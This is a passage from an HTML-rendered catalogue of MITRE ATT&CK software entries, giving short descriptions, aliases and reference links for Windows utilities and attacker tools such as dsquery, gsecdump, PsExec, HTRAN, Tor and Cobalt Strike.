<caption class="title">Table 1136. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0108">https://attack.mitre.org/wiki/Software/S0108</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/bb490939.aspx">https://technet.microsoft.com/library/bb490939.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dsquery_s0105"><a class="anchor" href="#_dsquery_s0105"></a><a class="link" href="#_dsquery_s0105">dsquery - S0105</a></h3>
<div class="paragraph">
<p>dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.</p>
</div>
<div class="paragraph">
<p>Aliases: dsquery, dsquery.exe</p>
</div>
<div class="paragraph">
<p>dsquery - S0105 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>dsquery</p>
</li>
<li>
<p>dsquery.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1137. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0105">https://attack.mitre.org/wiki/Software/S0105</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc732952.aspx">https://technet.microsoft.com/en-us/library/cc732952.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gsecdump_s0008"><a class="anchor" href="#_gsecdump_s0008"></a><a class="link" href="#_gsecdump_s0008">gsecdump - S0008</a></h3>
<div class="paragraph">
<p>gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)</p>
</div>
<div class="paragraph">
<p>Aliases: gsecdump</p>
</div>
<div class="paragraph">
<p>gsecdump - S0008 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>gsecdump</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1138. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0008">https://attack.mitre.org/wiki/Software/S0008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump%20v2.0b5">https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump%20v2.0b5</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ping_s0097"><a class="anchor" href="#_ping_s0097"></a><a class="link" href="#_ping_s0097">Ping - S0097</a></h3>
<div class="paragraph">
<p>Ping is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)</p>
</div>
<div class="paragraph">
<p>Aliases: Ping, ping.exe</p>
</div>
<div class="paragraph">
<p>Ping - S0097 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ping</p>
</li>
<li>
<p>ping.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1139. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0097">https://attack.mitre.org/wiki/Software/S0097</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490968.aspx">https://technet.microsoft.com/en-us/library/bb490968.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fgdump_s0120"><a class="anchor" href="#_fgdump_s0120"></a><a class="link" href="#_fgdump_s0120">Fgdump - S0120</a></h3>
<div class="paragraph">
<p>Fgdump is a Windows password hash dumper. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: Fgdump</p>
</div>
<div class="paragraph">
<p>Fgdump - S0120 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fgdump</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1140. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0120">https://attack.mitre.org/wiki/Software/S0120</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lslsass_s0121"><a class="anchor" href="#_lslsass_s0121"></a><a class="link" href="#_lslsass_s0121">Lslsass - S0121</a></h3>
<div class="paragraph">
<p>Lslsass is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: Lslsass</p>
</div>
<div class="paragraph">
<p>Lslsass - S0121 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lslsass</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1141. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0121">https://attack.mitre.org/wiki/Software/S0121</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_toolkit_s0122"><a class="anchor" href="#_pass_the_hash_toolkit_s0122"></a><a class="link" href="#_pass_the_hash_toolkit_s0122">Pass-The-Hash Toolkit - S0122</a></h3>
<div class="paragraph">
<p>Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: Pass-The-Hash Toolkit</p>
</div>
<div class="paragraph">
<p>Pass-The-Hash Toolkit - S0122 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pass-The-Hash Toolkit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1142. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0122">https://attack.mitre.org/wiki/Software/S0122</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ftp_s0095"><a class="anchor" href="#_ftp_s0095"></a><a class="link" href="#_ftp_s0095">FTP - S0095</a></h3>
<div class="paragraph">
<p>FTP is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)</p>
</div>
<div class="paragraph">
<p>Aliases: FTP, ftp.exe</p>
</div>
<div class="paragraph">
<p>FTP - S0095 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FTP</p>
</li>
<li>
<p>ftp.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1143. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0095">https://attack.mitre.org/wiki/Software/S0095</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/File%20Transfer%20Protocol">https://en.wikipedia.org/wiki/File%20Transfer%20Protocol</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ipconfig_s0100"><a class="anchor" href="#_ipconfig_s0100"></a><a class="link" href="#_ipconfig_s0100">ipconfig - S0100</a></h3>
<div class="paragraph">
<p>ipconfig is a Windows utility that can be used to find information about a system&#8217;s TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)</p>
</div>
<div class="paragraph">
<p>Aliases: ipconfig, ipconfig.exe</p>
</div>
<div class="paragraph">
<p>ipconfig - S0100 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ipconfig</p>
</li>
<li>
<p>ipconfig.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1144. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0100">https://attack.mitre.org/wiki/Software/S0100</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490921.aspx">https://technet.microsoft.com/en-us/library/bb490921.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nbtstat_s0102"><a class="anchor" href="#_nbtstat_s0102"></a><a class="link" href="#_nbtstat_s0102">nbtstat - S0102</a></h3>
<div class="paragraph">
<p>nbtstat is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)</p>
</div>
<div class="paragraph">
<p>Aliases: nbtstat, nbtstat.exe</p>
</div>
<div class="paragraph">
<p>nbtstat - S0102 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>nbtstat</p>
</li>
<li>
<p>nbtstat.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1145. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0102">https://attack.mitre.org/wiki/Software/S0102</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc940106.aspx">https://technet.microsoft.com/en-us/library/cc940106.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_htran_s0040"><a class="anchor" href="#_htran_s0040"></a><a class="link" href="#_htran_s0040">HTRAN - S0040</a></h3>
<div class="paragraph">
<p>HTRAN is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)</p>
</div>
<div class="paragraph">
<p>Aliases: HTRAN, HUC Packet Transmit Tool</p>
</div>
<div class="paragraph">
<p>HTRAN - S0040 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HTRAN</p>
</li>
<li>
<p>HUC Packet Transmit Tool</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1146. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0040">https://attack.mitre.org/wiki/Software/S0040</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tor_s0183"><a class="anchor" href="#_tor_s0183"></a><a class="link" href="#_tor_s0183">Tor - S0183</a></h3>
<div class="paragraph">
<p>Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)</p>
</div>
<div class="paragraph">
<p>Aliases: Tor</p>
</div>
<div class="paragraph">
<p>Tor - S0183 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1147. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0183">https://attack.mitre.org/wiki/Software/S0183</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf">http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netstat_s0104"><a class="anchor" href="#_netstat_s0104"></a><a class="link" href="#_netstat_s0104">netstat - S0104</a></h3>
<div class="paragraph">
<p>netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)</p>
</div>
<div class="paragraph">
<p>Aliases: netstat, netstat.exe</p>
</div>
<div class="paragraph">
<p>netstat - S0104 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>netstat</p>
</li>
<li>
<p>netstat.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1148. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0104">https://attack.mitre.org/wiki/Software/S0104</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490947.aspx">https://technet.microsoft.com/en-us/library/bb490947.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pwdump_s0006"><a class="anchor" href="#_pwdump_s0006"></a><a class="link" href="#_pwdump_s0006">pwdump - S0006</a></h3>
<div class="paragraph">
<p>pwdump is a credential dumper. (Citation: Wikipedia pwdump)</p>
</div>
<div class="paragraph">
<p>Aliases: pwdump</p>
</div>
<div class="paragraph">
<p>pwdump - S0006 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>pwdump</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1149. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0006">https://attack.mitre.org/wiki/Software/S0006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Pwdump">https://en.wikipedia.org/wiki/Pwdump</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cachedump_s0119"><a class="anchor" href="#_cachedump_s0119"></a><a class="link" href="#_cachedump_s0119">Cachedump - S0119</a></h3>
<div class="paragraph">
<p>Cachedump is a publicly-available tool that program extracts cached password hashes from a systems registry. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: Cachedump</p>
</div>
<div class="paragraph">
<p>Cachedump - S0119 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cachedump</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1150. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0119">https://attack.mitre.org/wiki/Software/S0119</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_net_s0039"><a class="anchor" href="#_net_s0039"></a><a class="link" href="#_net_s0039">Net - S0039</a></h3>
<div class="paragraph">
<p>The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)</p>
</div>
<div class="paragraph">
<p>Net has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through Windows admin shares using &lt;code&gt;net use&lt;/code&gt; commands, and interacting with services.</p>
</div>
<div class="paragraph">
<p>Aliases: Net, net.exe</p>
</div>
<div class="paragraph">
<p>Net - S0039 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Net</p>
</li>
<li>
<p>net.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1151. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0039">https://attack.mitre.org/wiki/Software/S0039</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/aa939914">https://msdn.microsoft.com/en-us/library/aa939914</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://windowsitpro.com/windows/netexe-reference">http://windowsitpro.com/windows/netexe-reference</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_psexec_s0029"><a class="anchor" href="#_psexec_s0029"></a><a class="link" href="#_psexec_s0029">PsExec - S0029</a></h3>
<div class="paragraph">
<p>PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)</p>
</div>
<div class="paragraph">
<p>Aliases: PsExec</p>
</div>
<div class="paragraph">
<p>PsExec - S0029 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PsExec</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1152. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0029">https://attack.mitre.org/wiki/Software/S0029</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx">https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive">https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_certutil_s0160"><a class="anchor" href="#_certutil_s0160"></a><a class="link" href="#_certutil_s0160">certutil - S0160</a></h3>
<div class="paragraph">
<p>Certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)</p>
</div>
<div class="paragraph">
<p>Aliases: certutil, certutil.exe</p>
</div>
<div class="paragraph">
<p>certutil - S0160 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>certutil</p>
</li>
<li>
<p>certutil.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1153. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0160">https://attack.mitre.org/wiki/Software/S0160</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/cc732443.aspx">https://technet.microsoft.com/library/cc732443.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_arp_s0099"><a class="anchor" href="#_arp_s0099"></a><a class="link" href="#_arp_s0099">Arp - S0099</a></h3>
<div class="paragraph">
<p>Arp displays information about a system&#8217;s Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)</p>
</div>
<div class="paragraph">
<p>Aliases: Arp, arp.exe</p>
</div>
<div class="paragraph">
<p>Arp - S0099 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Arp</p>
</li>
<li>
<p>arp.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1154. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0099">https://attack.mitre.org/wiki/Software/S0099</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490864.aspx">https://technet.microsoft.com/en-us/library/bb490864.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cmd_s0106"><a class="anchor" href="#_cmd_s0106"></a><a class="link" href="#_cmd_s0106">cmd - S0106</a></h3>
<div class="paragraph">
<p>cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)</p>
</div>
<div class="paragraph">
<p>Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., &lt;code&gt;dir&lt;/code&gt; (Citation: TechNet Dir)), deleting files (e.g., &lt;code&gt;del&lt;/code&gt; (Citation: TechNet Del)), and copying files (e.g., &lt;code&gt;copy&lt;/code&gt; (Citation: TechNet Copy)).</p>
</div>
<div class="paragraph">
<p>Aliases: cmd, cmd.exe</p>
</div>
<div class="paragraph">
<p>cmd - S0106 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>cmd</p>
</li>
<li>
<p>cmd.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1155. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0106">https://attack.mitre.org/wiki/Software/S0106</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490880.aspx">https://technet.microsoft.com/en-us/library/bb490880.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc755121.aspx">https://technet.microsoft.com/en-us/library/cc755121.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc771049.aspx">https://technet.microsoft.com/en-us/library/cc771049.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490886.aspx">https://technet.microsoft.com/en-us/library/bb490886.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_meek_s0175"><a class="anchor" href="#_meek_s0175"></a><a class="link" href="#_meek_s0175">meek - S0175</a></h3>
<div class="paragraph">
<p>is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.</p>
</div>
<div class="paragraph">
<p>Aliases: meek</p>
</div>
<div class="paragraph">
<p>meek - S0175 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>meek</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1156. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0175">https://attack.mitre.org/wiki/Software/S0175</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reg_s0075"><a class="anchor" href="#_reg_s0075"></a><a class="link" href="#_reg_s0075">Reg - S0075</a></h3>
<div class="paragraph">
<p>Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)</p>
</div>
<div class="paragraph">
<p>Utilities such as Reg are known to be used by persistent threats. (Citation: Windows Commands JPCERT)</p>
</div>
<div class="paragraph">
<p>Aliases: Reg, reg.exe</p>
</div>
<div class="paragraph">
<p>Reg - S0075 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Reg</p>
</li>
<li>
<p>reg.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1157. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0075">https://attack.mitre.org/wiki/Software/S0075</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc732643.aspx">https://technet.microsoft.com/en-us/library/cc732643.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154"><a class="anchor" href="#_cobalt_strike_s0154"></a><a class="link" href="#_cobalt_strike_s0154">Cobalt Strike - S0154</a></h3>
<div class="paragraph">
<p>Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strikes interactive post-exploit capabilities cover the full range of ATT&amp;CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)</p>
</div>
<div class="paragraph">
<p>In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. (Citation: cobaltstrike manual)</p>
</div>
<div class="paragraph">
<p>Aliases: Cobalt Strike</p>
</div>
<div class="paragraph">
<p>Cobalt Strike - S0154 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cobalt Strike</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1158. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0154">https://attack.mitre.org/wiki/Software/S0154</a></p></td>
</tr>
<tr>
